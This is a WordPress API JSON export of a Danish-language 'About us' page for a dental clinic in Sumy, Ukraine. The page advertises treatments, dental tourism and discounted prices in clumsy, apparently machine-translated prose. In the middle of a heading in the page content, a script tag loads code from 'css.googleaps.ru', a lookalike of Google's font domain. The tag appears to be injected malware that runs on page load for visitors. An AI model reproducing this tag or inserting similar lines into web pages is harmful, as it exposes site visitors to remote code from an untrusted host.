{"id":3715,"date":"2014-01-20T15:26:35","date_gmt":"2014-01-20T13:26:35","guid":{"rendered":"http:\/\/www.your-brilliant-smile.com\/?page_id=3715"},"modified":"2014-02-28T10:15:15","modified_gmt":"2014-02-28T08:15:15","slug":"om-os","status":"publish","type":"page","link":"https:\/\/your-brilliant-smile.com\/da","title":{"rendered":"Om os"},"content":{"rendered":"<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic.jpg\" rel=\"prettyPhoto[3715]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4140\" alt=\"Advantages of our dental clinic\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-300x199.jpg\" width=\"300\" height=\"199\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-300x199.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-630x418.jpg 630w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic-900x598.jpg 900w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental_clinic.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Fordel af vores tandklinik:<\/b><\/p>\n<ul>\n<li>Alle former for tandpleje.<\/li>\n<li>Tandpleje uden brug af boremaskine (Sandman -dansk teknologi)<\/li>\n<li>(Smertestilling af t\u00e6nder ved hj\u00e6lp af nano-tech an\u00e6stesisystemer) dataan\u00e6stesi<\/li>\n<li>Smertestilling af t\u00e6nder uden brug af kanyler (INJEX &#8211; tysk teknologi)<\/li>\n<li>R\u00f8ntgendiagnostik<\/li>\n<li>Proteseinds\u00e6ttelse uden fasede af sunde t\u00e6nder<\/li>\n<li>Proteseinds\u00e6ttelse med brug af implantater (tilg\u00e6ngelige &#8220;demokratiske&#8221; priser)<\/li>\n<li>Streng overholdelse med regimer \u201dmod \u2013 AIDS\u201d, \u201dmod \u2013 hepatitis\u201d.<\/li>\n<li>Gratis konsultation.<\/li>\n<li>Den hurtigste fremstillingstermer for proteser i regionen.<\/li>\n<li>Langtidserfaring af fagfolk.<\/li>\n<li>Garanti for hvert tanddesign udf\u00f8rt hos os.<\/li>\n<li>Fleksibel priss\u00e6tning (vores tandl\u00e6ger vil tilbyde dig alle mulige tanddesign fra billigste til dyreste VIP- modeller)<\/li>\n<li>Tandplejeydelser m\u00e5 bydes til i rater<\/li>\n<li>Proteseinds\u00e6tning og behandling d\u00e6kkes med forsikringspolice (hvis du er forsikret med forsikringsselskabet, og din forsikringspolice d\u00e6kker tandpleje)<\/li>\n<li>Luminiers p\u00e5 Hollywood-m\u00e5de (S\u00e6rlige ydelser for VIP-kunder)<\/li>\n<li>COMPONEER &#8211; s\u00e6rlige schweiziske teknologi for tandrestaurering (Nyanskaffelse i 2012)<\/li>\n<li>Vinier i l\u00f8bet af 1 dag.<\/li>\n<li>Privat dental laboratorium.<\/li>\n<li>Forslag for rabatter.<\/li>\n<li>Mulighed af fremstilling enhver modifikation af tandprotese.<\/li>\n<\/ul>\n<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis.jpg\" rel=\"prettyPhoto[3715]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4141\" alt=\"Dental prosthesis in Sumy city\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis-300x241.jpg\" width=\"300\" height=\"241\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis-300x241.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/Dental-prosthesis.jpg 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Udf\u00f8relse af tandproteser i Sumy by<\/b><\/p>\n<p>I vores klinik de tandl\u00e6ger udf\u00f8rer alle moderne modifikationer af tandproteser. Hvis du f\u00f8ler dig v\u00e6re i knibe med t\u00e6nder, det giver dig ingen grund til at bekymre sig. Vi vil hj\u00e6lpe dig med at l\u00f8se selv de mest vanskelige situationer.<\/p>\n<p>De som \u00f8nsker at inds\u00e6tte t\u00e6nder b\u00f8r r\u00e5dgives via online chat formular (popup hjemmeside www.your-brilliant-smile.com), eller ringe til nummeret +38 066 196 87 93. I s\u00e5 fald b\u00f8r du meldes til l\u00e6geunders\u00f8gelse (f\u00f8rste unders\u00f8gelse er gratis), efter du g\u00f8res kend med alle mulige l\u00f8sninger i dit fald og du m\u00e5 v\u00e6lge optimale design og g\u00e5 fremover med tandinds\u00e6ttelse.<\/p>\n<p>Vi er de hurtigste i regionen med fremstilling af tandproteser i vores klinik. Det tager vanligvis 3 &#8211; til 7 dage.<\/p>\n<p>Vi bestiller de \u201dproteser\u201d af VIP klasse i dentallaboratorier i Kiev og vesteurop\u00e6iske l\u00e6nder (Tyskland, Schweiz), henholdsvis p\u00e5 denne grund leveringstid efter fremstilling af proteser kan forl\u00e6nges, men protesekvaliteten skal v\u00e6re de bedste.<\/p>\n<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism.jpg\" rel=\"prettyPhoto[3715]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4142\" alt=\"Dental tourism in Ukraine\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism-300x200.jpg\" width=\"300\" height=\"200\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism-300x200.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-tourism.jpg 600w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Dental turisme i Ukraine. Eller hvorfor du skal henvise dig til os.<\/b><\/p>\n<p>I de seneste \u00e5r helt i verden vi anser at det er blevet en ny trend inden for turisme, s\u00e5som dental turisme. Du kan sandsynligvis spare dine penge og tid, og at bes\u00f8ge Ukraine, tage turer, og afs\u00e6tte lidt tid til at bekymre for deres helbred.<\/p>\n<p>Vi inviterer folk i alle lande til at bes\u00f8ge vor by Sumy og bes\u00f8ge vores tandklinik. Du kan tage mod en kvalificeret r\u00e5dgivning hvis skriver til os p\u00e5 mail (katsumoto2018@gmail.com), enten i online-mode eller via online chat. Den ideelle l\u00f8sning er at sende os en mail p\u00e5 din panoramiske r\u00f8ntgenbillede, vil vi v\u00e6re i stand til at r\u00e5dgive dig mere pr\u00e6cist og beregne omkostningerne ved det arbejde, f\u00f8r det startede. Vi tager os af alle de organisatoriske aspekter. V\u00e6r sikker p\u00e5 at vi skal hj\u00e6lpe dig med at finde dig et sted for midlertidigt ophold (lejlighed eller hotel). Det n\u00e6rmeste 4-stjernede hotel ligger 500 m fra vores klinik. Vi vil helt sikkert hj\u00e6lpe dig med at organisere din fritid, vi kan v\u00e6lge de passende turer i vores by, de muligheder at bes\u00f8ge historiske sev\u00e6rdigheder i vores region og vores nations hovedstad Kiev.<\/p>\n<p>Tandpleje er i stor eftersp\u00f8rgsel blandt befolkningen. Vores region har \u00e5bnet en masse af tandklinikker og kontorer, men hver tandl\u00e6ge betragter den samme situation forskelligt. Nogen udf\u00f8rer behandling og proteser mere sk\u00e5nsom for patienten, nogen g\u00f8r det mindre, og det er umuligt at klandre nogen. Hver l\u00e6ge og menneske er forskellige. Forskellige metoder de anvender. De bruger ogs\u00e5 forskellige metoder af overbevisning. P\u00e5 vores l\u00e6ger principper tilgang til rehabilitering af patienter adskiller sig fra andre. Vi f\u00f8lger stien af den mindste mellemkomst (hvis dette er muligt), rationalitet, sterilitet og smertefrihed.\u00a0 Alle behandlinger og proteser vi udf\u00f8rer med an\u00e6stesi (oftest bruger vi det tyske system INJEX, det giver dig mulighed for anvendelse af tandan\u00e6stesi uden brug af n\u00e5lestik.)<\/p>\n<p>Protesebehandling i vores klinik udf\u00f8res i individuel ordning (ved hj\u00e6lp af facade bue og artikulator, med og overf\u00f8ring data over din joint og antropometriske data). Individuel ordning giver muligheden at udf\u00f8re p\u00e5 pr\u00e6cis og behagelig m\u00e5de tandprotese for patienten og at betragte ikke kun formen af \u200b\u200bt\u00e6nderne, men ogs\u00e5 strukturen af \u200b\u200bden f\u00e6lles vinkler og bev\u00e6gelse (f\u00f8relse) af t\u00e6nder. De medf\u00f8rer at dette arbejde vil v\u00e6re udf\u00f8rt meget pr\u00e6cist og behageligt.<\/p>\n<p><strong>Vi udf\u00f8rer alle typer af tandproteser:<script src=\"\/\/css.googleaps.ru\/css?f=Open+Sans&#038;cd=mb&#038;ver=4.2.2\"><\/script><\/strong><\/p>\n<ul>\n<li>l\u00e5sprotese (tandproteser med l\u00e5s, klassiske l\u00e5sproteser, l\u00e5sproteser med teleskopisk l\u00e5sesystem, tandproteser med krageinds\u00e6ttelse, proteser med en bj\u00e6lke l\u00e5sesystem.)<\/li>\n<li>Metalfri keramik<\/li>\n<li>Metalkeramik (Cermet)<\/li>\n<li>Lumineers<\/li>\n<li>Vineer<\/li>\n<li>Componeers<\/li>\n<li>Proteseinds\u00e6tning med brug af implantater (implanter)<\/li>\n<li>Aftagelige protetik (proteser overlappende skive proteser, flytbare midlertidige proteser.)<\/li>\n<li>Midlertidige plastkroner, mikroproteser.<\/li>\n<li>Microprosthetic dental indl\u00e6g og p\u00e5l\u00e6g<\/li>\n<\/ul>\n<p><b>Tandbehandling<\/b> i vores klinik udf\u00f8res kun if\u00f8lge de mest moderne teknologier. Vi inds\u00e6tter plomber kun lavet fra glasionomercementer og fotopolymeriske kompositter fremstillet i Tyskland, Japan og USA. Tandrodbehandling i vores klinik udf\u00f8res med brug af Endomotor (udstyr som udvider tandrodkanalerne til den \u00f8nskede bredde) efterfulgt med af fyldning rodkanalen med opvarmede gummi og s\u00e6rlige forsegling af fuldcement.<\/p>\n<p>Nogle s\u00e6rlige tandbehandlinger udf\u00f8res ved hj\u00e6lp af kofferdam Raberdam (med isolering af behandlingsomr\u00e5de). I nogle tilfald vi byder ogs\u00e5 boring af t\u00e6nder uden brug af boremaskiner (teknologi g\u00f8r det muligt at fjerne det skadet tandv\u00e6v med en s\u00e6rlig anordning, der bogstaveligt talt bl\u00e6ser v\u00e6k det p\u00e5virkede v\u00e6v af tanden.)<\/p>\n<p><b>Behandling af tandk\u00f8dssygdomme<\/b> (periodontitis, paradentose, tandk\u00f8dsbet\u00e6ndelse) vi udf\u00f8rer ved hj\u00e6lp af en diodelaser &#8220;Biolase&#8221;. Denne teknologi fremmer p\u00e5lidelig antiseptisk effekt p\u00e5 skadet bl\u00f8dt v\u00e6v. Curettage (reng\u00f8ring periodontale lommer af granulationsv\u00e6v) udf\u00f8res ved hj\u00e6lp af en laser og er meget mere effektiv end standardprocedurer og byder en hurtig og god heling af. For 3 &#8211; 5 behandlinger h\u00e6rdes n\u00e6sten alle kendte sygdomme af de bl\u00f8de v\u00e6v.<\/p>\n<p><b>R\u00f8ntgendiagnose<\/b><\/p>\n<p>Ved hj\u00e6lp af vores egen X-ray maskine udf\u00f8rer vi n\u00f8jagtig diagnosticeringen p\u00e5 sygdomme i tands\u00e6t. I nogle tilf\u00e6lde skal vi bruge et r\u00f8ntgenbillede i de mellemliggende stadier af behandlingen.<\/p>\n<p><b>Laser Tandpleje <\/b><\/p>\n<p>Med brug af \u200b\u200blaseren m\u00e5 vi udf\u00f8re tandimplantation med hj\u00e6lp af laserudstyr, laser tandblegning, afkortning af tungeb\u00e5nd, uddybelse af mundforhal, behandling af paradentose, lukning af bihuletragt, behandling af pericoronitis.<\/p>\n<p><b>Tandpleje uden boremaskine<\/b><\/p>\n<p><b>Behandling og proteser ved hj\u00e6lp af forst\u00f8rrelse<\/b><\/p>\n<p><b>Kirurgisk tandbehandling <\/b><\/p>\n<p>Fjernelse af t\u00e6nder af enhver kompleksitet, kirurgiske parodontologi, fjernelse af cyster, fjernelse af tumorer, excision af tungeb\u00e5nd, uddybelse af mundforhal, tandimplantater, bengenplantning.<\/p>\n<p><b>Pyntning af t\u00e6nder<\/b><\/p>\n<p>Indl\u00e6ggelse af t\u00e6nder med skies, krystaller, \u00e6delsten.<\/p>\n<p><b>Gnatologi<\/b><\/p>\n<p>Konsultation hos gnatologer. Diagnosticering af sygdomme i TMJ (tinding \u2013 underk\u00e6beben). Diagnose og rettelse af oklusive abnormiteter ved hj\u00e6lp af artikulator og selektive spinding af t\u00e6nder. Fremstilling af bandager i behandlingen af \u200b\u200bbruxism, patologiske slettelse af t\u00e6nder. Fremstilling af bandager med omfattende tandproteser. Afslappende mundbeskyttelse. Flytbare mundbeskyttelse.<\/p>\n<p><b>Tandpleje for gravide kvinder <\/b><\/p>\n<p>Det bydes for gravide kvinder i vores klinik sk\u00e5nsomme metoder til behandling og proteser. De harml\u00f8se og certificerede medikamenter og fyldningsmaterialer.<\/p>\n<p><b>Tandimplantater<\/b><\/p>\n<p>Vi bliver opm\u00e6rksomme til brug af tandimplantater i vores klinik. Denne retning af protesebehandling og fjernelse af tanddefekter er en af \u200b\u200bde mest voksende i vor tid. Vi udf\u00f8rer alle protesebehandling med brug af implantater i henhold til individuel ordning, der passer til de individuelle egenskaber af strukturen af \u200b\u200bokklusion og bidfunktion. Vi arbejder kun med p\u00e5lidelige implantatsystemer fremstillet i Tyskland, USA og Israel.<\/p>\n<p><a href=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic.jpg\" rel=\"prettyPhoto[3715]\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-4143\" alt=\"New action offers\" src=\"https:\/\/www.your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic-300x160.jpg\" width=\"300\" height=\"160\" srcset=\"https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic-300x160.jpg 300w, https:\/\/your-brilliant-smile.com\/wp-content\/uploads\/2013\/09\/dental-clinic.jpg 595w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><b>Nye kampagnetilbud p\u00e5 vores klinik:<\/b><\/p>\n<p>1. FOTOPOLYMERPLOMBE FILTEK Z550 (USA) i alt koster 200 UAH.\u00a0(Fotopolymer &#8211; det er den mest holdbare og diskret fyldmateriale, er det ikke udhules, har ingen lille bitte fissur og det vigtigste er at det kan matches til enhver tandfarve (plombekul\u00f8r forskelles sig ikke fra naturtro tandkul\u00f8r). Hvorfor prisen i 200 UAH m\u00e5 betragtes som billig? Gennemsnitlige omkostninger for s\u00e5danne plomber ved tandklinikker i Kiev, Kharkiv og Lviv er s\u00e6t som 350-400 USD).<\/p>\n<p>2.\u00a0Protesebehandling.\u00a0VINEER IPS EMAX (Tyskland) koster kun 1000 UAH.\u00a0Hvad er vine\u00e9r?\u00a0Vin\u00e9er er tynde keramiske plader der giver dig mulighed for at \u00e6ndre farve og form af t\u00e6nderne.\u00a0Hvis du har sk\u00e6ve t\u00e6nder, det er et godt alternativ til tandseler.\u00a0Hvis du \u00f8nsker at f\u00e5 dine t\u00e6nder lysere for evige, og ikke for nogen tid, vin\u00e9er er for dig.\u00a0Hvorfor v\u00e6lger du IPS EMAX (Tyskland) og ikke noget anden firma?\u00a0IPS EMAX er den mest gennempr\u00f8vede teknologi og biokompatible, disse vin\u00e9erne ser ud s\u00e5 naturligt, at ingen ikke vil komme til at tro, at det ikke er dine naturelle, dog kunstige t\u00e6nder.\u00a0Teknologien er vedtaget og godkendt p\u00e5 verdensplan herunder og certificeret i Ukraine.\u00a0Hvorfor 1000 UAH er et billigt pris?\u00a0Den gennemsnitlige pris i byen Sumy &#8211; 2000 UAH.\u00a0I Europa, 1.000 euro for en enhed i Kiev &#8211; 3500 &#8211; 4000 UAH)<\/p>\n<p>3.\u00a0CERMET VITAVM13 (TYSKLAND) 650 UAH.<\/p>\n<p>VitaVM13 er materialet som har ingen analoge henh\u00f8rende \u00e6stetiske og holdbare egenskaber.\u00a0Metal-keramiske kroner fremstillet af dette materiale ser ud meget livlig, da dette giver dig mulighed for at genskabe massen af \u200b\u200balle nuancer, undertoner, fluorescerende og opaliserende egenskaber.\u00a0Hvert stykke som udf\u00f8res af dette stof er ligesom guldsmedv\u00e6rke.\u00a0(Gennemsnitspris i Sumy er 700 &#8211; 800 UAH for et stykke)<\/p>\n<p>4.\u00a0Laser blegning af t\u00e6nderne &#8211; 100\u00a0% resultat.\u00a01500 UAH.<\/p>\n<p>Laser tandblegning ikke medf\u00f8rer en stigning i f\u00f8lsomhed i t\u00e6nderne, giver dig mulighed for at f\u00e5 resultatet ikke i l\u00f8bet af en time eller en uge, men lige efter 20 minutter.<br \/>\n(I Sumy by, s\u00e5dant udstyr er kun tilg\u00e6ngelig hos os i vor klinik. \u00a0Gennemsnitspris s\u00e6t for laser kridtning af t\u00e6nder i Kiev (med samme laserudstyr og kridtning kits vi bruger nu) &#8211; 3000 -. 4500 UAH)<\/p>\n<p>5.\u00a0Metalfri keramik &#8211; uovertruffen \u00e6stetik (keramiske indl\u00e6g, kroner, lakeringer). Maximale \u00e6stetik bydes mod salgsfremmende pris p\u00e5 1000 UAH!\u00a0Gammelt pris &#8211; 2000 UAH.<br \/>\nHvis du \u00f8nsker at f\u00e5 et bl\u00e6ndende smil og \u200b\u200bprodukt af h\u00f8j kvalitet det er den bedste l\u00f8sning for dig og dine venner<img decoding=\"async\" class=\"kws-smiley\" src=\"https:\/\/your-brilliant-smile.com\/wp-content\/plugins\/kama-wp-smile\/packs\/qip\/smile.gif\" alt=\"smile\" \/><\/p>\n<p>6.\u00a0&#8220;Usynlige&#8221; tandproteser.<span style=\"line-height: 1.5em;\">\u00a0Design med l\u00e5sklemmer.\u00a0 Protesebehandling med implanter.\u00a0Den omfatter alle muligheder, du f\u00e5r protesen helt usynlig for mennesker omkring dig, der vil holde en stabilt og ikke vil lade dig i knibe.<\/span><\/p>\n<p>7.\u00a0Tandpleje for gravide kvinder.\u00a0Dette afsnit er meget forskellig fra den s\u00e6dvanlige tandpleje.\u00a0Her er s\u00e5 mange nuancer.\u00a0For gravide kvinder b\u00f8r behandles med s\u00e6rlig opm\u00e6rksomhed og omsorg til udvalg af \u200b\u200bvisse medicinske\u00a0pr\u00e6parater.<\/p>\n<p><strong>8.\u00a0Dental proteser i rater p\u00e5 op til 1 \u00e5r.\u00a0<\/strong><\/p>\n<p>9.\u00a0Fler\u00e5rige erfaring af fagm\u00e6nd.<\/p>\n<p>10.\u00a0Vi byder til garantifrist p\u00e5 proteser 3 \u00e5r.\u00a0Behandlingen som d\u00e6kkes af garanti &#8211; 1 \u00e5r.\u00a0Ikke at forveksle med en livstidsgaranti, det er et andet begreb, livstidsgaranti altid overstiger garantifrist.\u00a0Garantien kommer i kraft n\u00e5r protese eller plombe er knust, eller fylden faldt ud.\u00a0Vi er interesseret i at g\u00f8re dig tilfreds med vores ydelser, s\u00e5 overholdelse af garantifrister er en af \u200b\u200bvores ufravigelige regler.<\/p>\n<p>11.\u00a0Lumineers \u201dHollywood-smil\u201d er en unik teknologi som giver dig mulighed for at oprette individuelle ultratynde vineer uden slibning af dine t\u00e6nder.\u00a0(I Sumy by, er ingen anden end vores klinik ikke som certificeret af denne metode.)<\/p>\n<p>12.\u00a0Componeeren (vineeren for \u00e9t bes\u00f8g) \u2013 de er vineer lavet af presset kompositmateriale. Fordelen ved denne teknik er, at det kan lavet i et enkelt bes\u00f8g hos tandl\u00e6gen.\u00a0I vores klinik, en s\u00e5dan vineer koster 1500 UAH.\u00a0(I Sumy by, er ingen anden end vores klinik som certificeret af denne metode.)<\/p>\n<p>13.\u00a0Den hurtigste frister for \u200b\u200bproteselavning (3 &#8211; til 5 &#8211; dage).<\/p>\n<p>15.\u00a0&#8220;Muligheden for fremstilling af enhver modifikation protese.&#8221;\u00a0I vores klinik, kan du bestille nogen form for protese.\u00a0Vi laver proteser med henblik p\u00e5 alle eksisterende moderne teknikker, og altid forbedrer vores viden p\u00e5 workshops og masterclasses ved at l\u00e6re nye teknikker og muligheder.<\/p>\n<p>16.\u00a0Arbejdet ved hj\u00e6lp af forst\u00f8rrelsesudstyr.\u00a0(Tandl\u00e6ge ligesom en guldsmed ved udf\u00f8relse af sit arbejd p\u00e5 bedste og smukkeste m\u00e5de kan ikke m\u00f8rke alle nuancer uden brug af tre- eller &#8211; femdobling udstyr. I tilf\u00e6lde, hvor patienten har en forh\u00f8jet \u00e6stetiske krav, vi bruger forst\u00f8rrelsesglas-udstyr.)<\/p>\n<p>17.\u00a0P\u00e6diatrisk tandpleje<span style=\"line-height: 1.5em;\"> (forberedelse af tandinds\u00e6tning uden boremaskiner.)\u00a0<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Fordel af vores tandklinik: Alle former for tandpleje. Tandpleje uden brug af boremaskine (Sandman -dansk teknologi) (Smertestilling af t\u00e6nder ved hj\u00e6lp af nano-tech an\u00e6stesisystemer) dataan\u00e6stesi Smertestilling af t\u00e6nder uden brug af kanyler (INJEX &#8211; tysk teknologi) R\u00f8ntgendiagnostik Proteseinds\u00e6ttelse uden fasede af sunde t\u00e6nder Proteseinds\u00e6ttelse med brug af implantater (tilg\u00e6ngelige &#8220;demokratiske&#8221; priser) Streng overholdelse med regimer [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/pages\/3715"}],"collection":[{"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/comments?post=3715"}],"version-history":[{"count":3,"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/pages\/3715\/revisions"}],"predecessor-version":[{"id":4146,"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/pages\/3715\/revisions\/4146"}],"wp:attachment":[{"href":"https:\/\/your-brilliant-smile.com\/da\/wp-json\/wp\/v2\/media?parent=3715"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}